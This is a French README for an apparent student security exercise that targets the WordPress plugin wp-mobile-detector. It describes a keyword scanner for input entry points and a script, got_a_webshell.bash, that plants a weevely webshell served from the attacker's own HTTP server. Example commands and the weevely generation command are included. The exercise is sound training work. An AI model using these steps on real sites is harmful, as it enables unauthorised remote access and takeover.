# Vuln. Ynov sur le plugin wp-mobile-detector

Le but de l'exercice était de repérer une ou plusieurs failles de sécurité dans le plugin wp-mobile-detector fait pour Word Press.
L'exercice était découpé en plusieurs étapes:

- Créer un scanner pour trouver les points d'entrer sur le plugin
- Monter une infra. avec un WordPress et le plugin d'installé dessus.
- Faire un POC sur l'infra. avec un script de démonstration.


## scan_code_php.bash

|Requirements|
|---|
|bash|
|grep|

Ce petit script permet de scanner le dossier du plugin pour verifier certains mots clés permettant de trouver les points d'entrer du plugin.


Il y a plusieurs arguements pour ce script.

- 1: PATH du plugin a scanner
- 2: Groupe de mots-clé recherché
- 3: Le ou les fichiers/dossiers à exclure de la recherche

exemple : `bash ./scan_code_php.bash ./wp-mobile-detector '$_GET $_POST $_REQUEST' '*.js'`

[![asciicast](https://asciinema.org/a/XsscpCpFSWgHgROgyYlFv6yVl.svg)](https://asciinema.org/a/XsscpCpFSWgHgROgyYlFv6yVl)

## got_a_webshell.bash

|Requirements|
|---|
|bash|
|curl|
|python3|
|weevely|

Ce petit script vas vous permettre d'obtenir un webshell directement dans votre shell.

Il y a plusieurs arguements pour ce script.

- 1: Adresse URL du dossier wp-mobile-detector
- 2: IP qui va vous servir à créer un serveur http sur votre machine pour délivrer le webshell
- 3: est le PATH du dossier où se trouve le webshell
- 4: Le nom du webshell (avec sont extensions)
- 5: Mot de passe du webshell

exemple : `bash ./got_a_webshell.bash http://192.168.100.5:8080/wp-content/plugins/wp-mobile-detector/ 192.168.100.5 ./ myagent.php foobarmofo`

[![asciicast](https://asciinema.org/a/uD8PUkwSSnE1wkjj39sHmlaKV.svg)](https://asciinema.org/a/uD8PUkwSSnE1wkjj39sHmlaKV)

---

Information sur weevely : Pour créer le webshell vous devez utiliser le tool weevely avec la commande : `weevely generate ./myagent.php foobarmofo`
Pour plus d'informations sur le tools allez sur : [https://github.com/epinna/weevely3](https://github.com/epinna/weevely3) 
